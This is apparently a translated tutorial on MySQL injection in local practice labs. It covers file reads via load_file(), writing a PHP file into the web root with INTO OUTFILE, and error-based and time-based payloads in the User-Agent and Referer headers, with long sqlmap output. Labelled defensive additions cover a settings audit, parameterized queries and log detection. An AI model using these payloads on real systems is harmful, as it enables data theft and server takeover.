Python Full Stack (5): Web Security Offense and Defense, Part 7. MySQL Injection: Reading and Writing Files, and SQL Injection in HTTP Headers

I. MySQL injection: reading and writing files

1. Setting up a new test environment (target range)

pikachu is a fairly comprehensive vulnerability platform written in PHP; it needs a PHP environment and a MySQL database.
Download it from https://download.csdn.net/download/CUFEECR/12230045, unpack it, and copy it into the WWW directory under phpstudy; testing can then begin.
The installation and initialization steps are as follows:
[Figure: pikachu installation and configuration]
Because the configuration file already has the initial parameters set, it can be used as-is without modification.
Injection tests can be carried out on pikachu.

2. Overview of reading and writing files

MySQL offers many capabilities that can be used during a penetration test: besides reading data, it can also read and write files.
Prerequisites for reading and writing files:

  • the database user has sufficiently high privileges, ideally root
  • secure_file_priv is not NULL

3. Reading files

Query in SQL:

show global variables like 'secure_file_priv';

Output:

+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv | NULL  |
+------------------+-------+
1 row in set, 1 warning (0.01 sec)

The default is NULL, so it has to be set in the configuration file:
add the line secure_file_priv= under [mysqld], i.e. set secure_file_priv to the empty string (which is different from NULL), restart MySQL, and query again; the result is now

+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
1 row in set, 1 warning (0.01 sec)

The value is now empty, so files can be read.
MySQL reads files with the load_file() function.
Read a file:

select load_file('XXXX\target.txt');

Output:

+-------------------------------------------------+
| load_file('XXXX\target.txt') |
+-------------------------------------------------+
| NULL                                            |
+-------------------------------------------------+
1 row in set (0.00 sec)

The read returns NULL, which means something is still wrong: inside a MySQL string literal a backslash starts an escape sequence, so the path separators have to be written as \\ instead. Test again:

select load_file('XXXX\\target.txt');

Output:

+---------------------------------+
| load_file('XXXX\\target.txt')   |
+---------------------------------+
| POST /sqli-labs/Less-12/ HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Content-Length: 28
Pragma: no-cache
Cache-Control: no-cache
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Referer: http://127.0.0.1/sqli-labs/Less-12/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF

uname=&passwd=&submit=Submit |
+---------------------------------+
1 row in set (0.00 sec)

The file is now read correctly.
Visiting http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,load_file('C:\Users\Lenovo\Desktop\target.txt'),3 --+ shows:
[Figure: SQL load_file]
The content of the file is read out.

4. Writing files

Check the file-writing options:

show variables like '%general%';

Output:

+------------------+-----------------------------------------------------------------------+
| Variable_name    | Value                                                                 |
+------------------+-----------------------------------------------------------------------+
| general_log      | OFF                                                                   |
| general_log_file | XXXX\MySQL\phpstudy_pro\Extensions\MySQL5.7.26\data\LAPTOP-61GNXXXX.log |
+------------------+-----------------------------------------------------------------------+
2 rows in set, 1 warning (0.01 sec)

Off by default.
Turn on file writing:

set global general_log = on;

Output:

Query OK, 0 rows affected (0.00 sec)

Querying again now prints:

+------------------+-----------------------------------------------------------------------+
| Variable_name    | Value                                                                 |
+------------------+-----------------------------------------------------------------------+
| general_log      | ON                                                                    |
| general_log_file | XXXX\MySQL\phpstudy_pro\Extensions\MySQL5.7.26\data\LAPTOP-61GNXXXX.log |
+------------------+-----------------------------------------------------------------------+
2 rows in set, 1 warning (0.00 sec)

File writing is now clearly enabled, and the log is kept at E:\MySQL\phpstudy_pro\Extensions\MySQL5.7.26\data\LAPTOP-61GNXXXX.log.
Files are written with into outfile.
SQL test:

select * from users into outfile 'XXXX\\users.txt';

Output:

Query OK, 14 rows affected (0.00 sec)

A users.txt file now appears on the desktop with the following content:

1 Dumb Dumb
2 Angelina I-kill-you
3 Dummy p@ssword
4 secure crappy
5 stupid stupidity
6 superman genious
7 batman mob!le
8 admin admin
9 admin1 admin1
10 admin2 admin2
11 admin3 admin3
12 dhakkan dumbo
13 admin4 admin4
14 admin5 admin5

Visiting http://127.0.0.1/sqli-labs/Less-7/?id=1')) union select 1,'<?php phpinfo(); ?>',3 into outfile 'E:\MySQL\phpstudy_pro\WWW\sqli-labs\Less-7\1.php' --+ shows:
[Figure: SQL into outfile]
Although the page reports an error, 1.php has appeared under sqli-labs/Less-7 in the PHP web directory, with the content:

1 Dumb Dumb
1 <?php phpinfo(); ?> 3

Visiting http://127.0.0.1/sqli-labs/Less-7/1.php shows:
[Figure: SQL into outfile 1.php]
Clearly a lot of information about the PHP installation is exposed, which is a security risk.
Testing with sqlmap:
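As an added defender-side example (not part of the page), the Python below evaluates the settings this chapter inspects: secure_file_priv from the read section (NULL disables load_file() and INTO OUTFILE, the empty string removes every restriction, a directory confines them to that directory), the general query log and the location of its file from the write section, local_infile, and whether the application account holds the FILE privilege (directly or through ALL PRIVILEGES), which is what the "sufficiently high privileges" prerequisite amounts to. The inputs are plain dicts and lists shaped like the rows SHOW GLOBAL VARIABLES and SHOW GRANTS return, so it runs offline; the two sample configurations, the account name and the web-root path are constructed.

```python
import re


def _is_null(value):
    """SHOW VARIABLES reports SQL NULL: None through a Python connector,
    the literal text 'NULL' when copied from the mysql command-line client."""
    return value is None or str(value).strip().upper() == "NULL"


def _under(path, root):
    """True if path lies inside root; tolerant of Windows/POSIX separators and case."""
    if not path or not root:
        return False
    norm = lambda s: str(s).replace("\\", "/").rstrip("/").lower() + "/"
    return norm(path).startswith(norm(root))


def audit_file_access(variables, grants, web_root=None):
    """Return (severity, message) findings for the file read/write attack surface.
    variables: {name: value} from SHOW GLOBAL VARIABLES; grants: strings from SHOW GRANTS."""
    findings = []

    sfp = variables.get("secure_file_priv")
    if _is_null(sfp):
        pass  # LOAD_FILE() and INTO OUTFILE refuse every path: the safe setting
    elif str(sfp).strip() == "":
        findings.append(("HIGH", "secure_file_priv is empty: LOAD_FILE() and INTO OUTFILE "
                                 "may use any path the server process can reach"))
    elif _under(sfp, web_root):
        findings.append(("HIGH", "secure_file_priv directory %s lies inside the web root, "
                                 "so INTO OUTFILE can drop server-side scripts there" % sfp))
    else:
        findings.append(("LOW", "secure_file_priv confines file I/O to %s" % sfp))

    if str(variables.get("general_log", "OFF")).upper() == "ON":
        log_file = variables.get("general_log_file", "")
        if _under(log_file, web_root):
            findings.append(("HIGH", "general_log is ON and general_log_file %s lies inside the "
                                     "web root, where the logged statement text is reachable over HTTP" % log_file))
        else:
            findings.append(("MEDIUM", "general_log is ON: every statement, injected ones "
                                       "included, is written to %s" % log_file))

    if str(variables.get("local_infile", "OFF")).upper() == "ON":
        findings.append(("LOW", "local_infile is ON: LOAD DATA LOCAL can read files from a connecting client"))

    for grant in grants:
        if re.search(r"\bALL PRIVILEGES\b|\bFILE\b", grant, re.I):
            findings.append(("HIGH", "account holds the FILE privilege (directly or via ALL PRIVILEGES): %s" % grant))

    return findings


# Constructed sample 1: the state the page ends up in (secure_file_priv set to empty,
# general_log switched on) plus a log file and a root-like grant placed deliberately badly.
WEAK_VARIABLES = {
    "secure_file_priv": "",
    "general_log": "ON",
    "general_log_file": "E:/phpstudy_pro/WWW/sqli-labs/query.log",  # constructed path
    "local_infile": "ON",
}
WEAK_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO 'webapp'@'%' WITH GRANT OPTION"]  # constructed

# Constructed sample 2: a hardened configuration that yields no findings.
HARDENED_VARIABLES = {
    "secure_file_priv": "NULL",
    "general_log": "OFF",
    "general_log_file": "/var/lib/mysql/host.log",
    "local_infile": "OFF",
}
HARDENED_GRANTS = ["GRANT SELECT, INSERT, UPDATE ON `security`.* TO 'webapp'@'localhost'"]

WEB_ROOT = "E:/phpstudy_pro/WWW"  # constructed; stands for the phpstudy WWW directory


if __name__ == "__main__":
    for sev, msg in audit_file_access(WEAK_VARIABLES, WEAK_GRANTS, WEB_ROOT):
        print("[%s] %s" % (sev, msg))
    print("hardened:", audit_file_access(HARDENED_VARIABLES, HARDENED_GRANTS, WEB_ROOT))
```

Run it against a live server by filling the dicts from `SHOW GLOBAL VARIABLES` and `SHOW GRANTS FOR <app user>` through any DB-API connector; the point of the check is that the account the web application connects with should never satisfy the two prerequisites listed above at the same time.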

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-7/?id=1 --file-read "XXXX\\target.txt"

Output:

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:08:08 /2020-03-05/

[20:08:08] [INFO] testing connection to the target URL
[20:08:08] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:08:08] [INFO] testing if the target URL content is stable
[20:08:09] [INFO] target URL content is stable
[20:08:09] [INFO] testing if GET parameter 'id' is dynamic
[20:08:09] [WARNING] GET parameter 'id' does not appear to be dynamic
[20:08:09] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[20:08:09] [INFO] testing for SQL injection on GET parameter 'id'
[20:08:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:08:09] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="are")
[20:08:10] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[20:08:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:08:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:08:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:08:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:08:15] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:08:15] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:08:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:08:15] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:08:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:08:15] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:08:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:08:15] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:08:15] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:08:15] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[20:08:15] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[20:08:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:08:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[20:08:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[20:08:16] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[20:08:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:08:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[20:08:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[20:08:16] [INFO] testing 'Generic inline queries'
[20:08:16] [INFO] testing 'MySQL inline queries'
[20:08:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:08:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:08:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:08:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:08:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:08:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:08:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:08:26] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:08:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:08:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:08:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[20:08:27] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[20:08:27] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[20:08:28] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[20:08:28] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[20:08:29] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[20:08:29] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[20:08:29] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[20:08:30] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[20:08:30] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[20:08:31] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 284 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 1379=1379 AND ('FhWh'='FhWh

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1') AND (SELECT 1975 FROM (SELECT(SLEEP(5)))AHJv) AND ('IFMc'='IFMc
---
[20:08:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[20:08:46] [INFO] fingerprinting the back-end DBMS operating system
[20:08:46] [INFO] the back-end DBMS operating system is Windows
[20:08:46] [INFO] fetching file: 'C:/Users/Lenovo/Desktop/target.txt'
[20:08:46] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:08:46] [INFO] retrieved:
[...]
do you want confirmation that the remote file 'XXXX/target.txt' has been successfully downloaded from the back-end DBMS file system? [Y/n]

[20:27:00] [INFO] retrieved:
[20:27:00] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:27:00] [WARNING] unexpected HTTP code 'None' detected. Will use (extra) validation step in similar cases
[20:27:00] [WARNING] unexpected HTTP code '200' detected. Will use (extra) validation step in similar cases
832
[20:27:00] [INFO] the local file 'XXX\sqlmap\output\127.0.0.1\files\C__Users_Lenovo_Desktop_target.txt' and the remote file 'C:/Users/Lenovo/Desktop/target.txt' have the same size (832 B)
files saved to [1]:
[*] XXX\sqlmap\output\127.0.0.1\files\C__Users_Lenovo_Desktop_target.txt (same file)

[20:27:00] [INFO] fetched data logged to text files under 'XXX\sqlmap\output\127.0.0.1'

[*] ending @ 20:27:00 /2020-03-05/


The content that was read is saved as XXXX_target.txt under the XXX\sqlmap\output\127.0.0.1\files directory.

II. SQL injection in HTTP headers

1. Introduction to SQL injection in HTTP headers

As security awareness grows, many websites take measures to prevent vulnerabilities.
For SQL injection, for example, the parameters a user submits are usually filtered by some measure in the code;
but while parameters submitted directly by the user are filtered, the content submitted in HTTP headers quite possibly is not.

The updatexml function

UPDATEXML(XML_document, XPath_string, new_value);
Parameter description:

  • XML_document is a string: the name of the XML document object, Doc in the text
  • XPath_string is an XPath-format string
  • new_value is a string that replaces the data found by the XPath match
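As an added example (not code from the page or from sqli-labs), the following Python shows the root cause this section describes: a header value spliced into SQL text versus the same lookup with a bound parameter. It uses an in-memory SQLite database as a stand-in for MySQL, so the updatexml() error-based payload cannot be run here; the boolean closing trick the page tests, ' or '1' = '1, is used instead, sent as a User-Agent. The uagents table and its rows are constructed, modelled on the table sqli-labs Less-18 fills from the User-Agent header.

```python
import sqlite3

# Constructed stand-in for the uagents table that sqli-labs Less-18 fills from
# the User-Agent header (columns follow the lab: uagent, ip_address, username).
SAMPLE_VISITS = [
    ("Mozilla/5.0 (constructed browser)", "127.0.0.1", "admin"),
    ("curl/7.68.0 (constructed)", "127.0.0.1", "Dumb"),
    ("Wget/1.20 (constructed)", "127.0.0.1", "Dummy"),
]

# The closing payload the page tests against the users table, here used as a header value.
PAYLOAD = "' or '1' = '1"


def make_db():
    """In-memory SQLite database standing in for MySQL (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE uagents (uagent TEXT, ip_address TEXT, username TEXT)")
    conn.executemany("INSERT INTO uagents VALUES (?, ?, ?)", SAMPLE_VISITS)
    return conn


def lookup_vulnerable(conn, user_agent):
    """BAD: the header is pasted into the statement text, exactly like
    interpolating $_SERVER['HTTP_USER_AGENT'] into a PHP query string.
    A quote in the header ends the literal and the rest is parsed as SQL."""
    sql = "SELECT username FROM uagents WHERE uagent = '%s'" % user_agent
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, user_agent):
    """GOOD: the header travels as a bound parameter, so the database never
    parses it as SQL. '?' is SQLite's placeholder; MySQL drivers such as
    PyMySQL use '%s' with the same (sql, params) calling convention."""
    sql = "SELECT username FROM uagents WHERE uagent = ?"
    return [row[0] for row in conn.execute(sql, (user_agent,))]


def breaks_on_apostrophe(conn, user_agent):
    """Even a harmless header containing an apostrophe breaks the vulnerable
    build: True when the concatenated statement fails to parse."""
    try:
        lookup_vulnerable(conn, user_agent)
        return False
    except sqlite3.OperationalError:
        return True


def demo():
    conn = make_db()
    benign = "Mozilla/5.0 (constructed browser)"
    return {
        "benign_vulnerable": lookup_vulnerable(conn, benign),
        "benign_safe": lookup_safe(conn, benign),
        "payload_vulnerable": lookup_vulnerable(conn, PAYLOAD),  # every row leaks
        "payload_safe": lookup_safe(conn, PAYLOAD),              # no row matches
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print("%-20s %s" % (name, rows))
```

The filtering the section mentions is applied to form fields; headers such as User-Agent, Referer and Cookie reach the same query-building code, so the fix is to bind every externally supplied value, whatever request part it came from, rather than to extend the filter list.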

2. HTTP User-Agent injection

Visiting http://127.0.0.1/sqli-labs/Less-18/ shows:
[Figure: sqli-labs Less-18]
The IP address and the browser's User-Agent are displayed.
Testing shows that the single quote can be closed:

select * from users where id = '1' or '1' = '1';

Output:

+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 13 | admin4   | admin4     |
| 14 | admin5   | admin5     |
+----+----------+------------+
14 rows in set (0.00 sec)

Append ' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1' = '1 to the User-Agent to test User-Agent injection; the procedure is as follows:
[Figure: HTTP User-Agent injection, version]
The preview shows:
[Figure: HTTP User-Agent injection result]
This exposes the database version, 5.7.26.
Note:
the steps above must be done in Firefox, because only Firefox has the edit-and-resend feature;
0x7e is hexadecimal for ~, added so that the returned information stands out more clearly.
Append ' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1' = '1 to the User-Agent; the result is:
[Figure: HTTP User-Agent injection, database]
This reveals that the database is security.

Resending in Burp Suite

3. HTTP Referer injection

Test in Firefox with edit-and-resend, as follows:
[Figure: HTTP Referer injection test]
There is an injection point; test it as follows:
[Figure: HTTP Referer injection test 2]
The response clearly arrives only after a delay of about 5 seconds.
Note:
if the visited page does not display the Referer, the phpstudy version may be too new; switch to an older version and rebuild the test environment.
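As an added example written from the defender's side (not part of the page, which drives the tests with Firefox and sqlmap), the following Python scans web-server access-log lines in Apache's combined format, where Referer and User-Agent are the last two quoted fields, for the traces that the User-Agent and Referer payloads above leave behind: updatexml()/extractvalue() calls, sleep() delays, load_file()/INTO OUTFILE, the 0x7e marker, and a quote followed by and/or. The three log lines are constructed: the second carries the User-Agent payload from the page, the third a time-delay Referer modelled on the 5-second delay described above, and the first is benign traffic whose URL happens to contain the word "select".

```python
import re

# Apache "combined" log format: ... "request" status size "referer" "user-agent".
# (Apache escapes embedded double quotes as \" ; these constructed samples contain none.)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Indicators drawn from the payloads discussed on the page plus their usual companions.
INDICATORS = [
    ("xml error-based function", re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    ("time-delay function", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("file read/write", re.compile(r"\bload_file\s*\(|\binto\s+(out|dump)file\b", re.I)),
    ("union select", re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)),
    ("quote followed by and/or", re.compile(r"'\s*(and|or)\s+[\w'(]", re.I)),
    ("0x7e tilde marker", re.compile(r"0x7e", re.I)),
]

# Constructed sample log (not real traffic).
SAMPLE_LOG = """\
127.0.0.1 - - [10/Mar/2020:12:27:53 +0800] "GET /sqli-labs/Less-18/ HTTP/1.1" 200 1432 "http://127.0.0.1/docs/select-options" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36"
127.0.0.1 - - [10/Mar/2020:12:28:10 +0800] "POST /sqli-labs/Less-18/ HTTP/1.1" 200 1610 "http://127.0.0.1/sqli-labs/Less-18/" "' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1' = '1"
127.0.0.1 - - [10/Mar/2020:12:30:02 +0800] "POST /sqli-labs/Less-19/ HTTP/1.1" 200 1610 "http://127.0.0.1/sqli-labs/Less-19/' and sleep(5) and '1'='1" "Mozilla/5.0 (constructed)"
"""


def classify(value):
    """Return the labels of every indicator that matches a header value."""
    return [label for label, rx in INDICATORS if rx.search(value)]


def scan_line(line):
    """Parse one log line; return None if it is not in combined format,
    otherwise the client IP, request line and per-header findings."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    for header, field in (("Referer", "referer"), ("User-Agent", "agent")):
        labels = classify(m.group(field))
        if labels:
            findings.append((header, labels))
    return {"ip": m.group("ip"), "request": m.group("request"), "findings": findings}


def scan_log(lines):
    """One alert per suspicious header across all lines; unparsable lines are skipped."""
    alerts = []
    for line in lines:
        parsed = scan_line(line)
        if not parsed:
            continue
        for header, labels in parsed["findings"]:
            alerts.append({"ip": parsed["ip"], "request": parsed["request"],
                           "header": header, "labels": labels})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG.splitlines()):
        print("%(ip)s %(request)s  %(header)s: %(labels)s" % alert)
```

Two or more labels on one header value is a strong signal; a single "quote followed by and/or" hit on its own can come from ordinary text, so in production it is worth weighting the labels rather than alerting on any match. For the time-based Referer case the log line itself shows nothing unusual about the response, which is why the request-duration field (%D in Apache, $request_time in nginx) belongs in the log format alongside the headers.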

sqlmap security testing

Three ways to test:

  • --forms: automatically search for POST forms to inject
  • --data: specify the parameters to probe for SQL injection
  • read the request from a file: for Referer injection, replace the Referer value with * or append * to it

(1) Testing with --forms:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-19/ --forms --banner --batch

Output:

        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:27:53 /2020-03-10/

[12:27:53] [INFO] testing connection to the target URL
[12:27:55] [INFO] searching for forms
[#1] form:
POST http://127.0.0.1/sqli-labs/Less-19/
POST data: uname=&passwd=&submit=Submit
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: uname=&passwd=&submit=Submit] (Warning: blank fields detected): uname=&passwd=&submit=Submit
do you want to fill blank fields with random values? [Y/n] Y
[12:27:57] [INFO] using 'XXX\sqlmap\output\results-03102020_1227pm.csv' as the CSV results file in multiple targets mode
[12:28:00] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:28:02] [INFO] testing if the target URL content is stable
[12:28:04] [INFO] target URL content is stable
[12:28:04] [INFO] testing if POST parameter 'uname' is dynamic
[12:28:06] [WARNING] POST parameter 'uname' does not appear to be dynamic
[12:28:08] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable
[12:28:10] [INFO] testing for SQL injection on POST parameter 'uname'
[12:28:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:28:20] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:28:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:28:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:28:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:28:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:29:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:29:05] [INFO] testing 'Generic inline queries'
[12:29:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:29:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:29:23] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:29:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:29:41] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:29:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[12:30:02] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[12:30:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:30:32] [WARNING] POST parameter 'uname' does not seem to be injectable
[12:30:32] [INFO] testing if POST parameter 'passwd' is dynamic
[12:30:34] [WARNING] POST parameter 'passwd' does not appear to be dynamic
[12:30:36] [WARNING] heuristic (basic) test shows that POST parameter 'passwd' might not be injectable
[12:30:38] [INFO] testing for SQL injection on POST parameter 'passwd'
[12:30:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:30:49] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:30:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:31:01] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:31:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:31:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:31:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:31:33] [INFO] testing 'Generic inline queries'
[12:31:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:31:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:31:52] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:32:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:32:10] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:32:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[12:32:30] [INFO] testing 'Oracle AND time-based blind'
[12:32:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:33:01] [WARNING] POST parameter 'passwd' does not seem to be injectable
[12:33:01] [INFO] testing if POST parameter 'submit' is dynamic
[12:33:03] [WARNING] POST parameter 'submit' does not appear to be dynamic
[12:33:05] [WARNING] heuristic (basic) test shows that POST parameter 'submit' might not be injectable
[12:33:07] [INFO] testing for SQL injection on POST parameter 'submit'
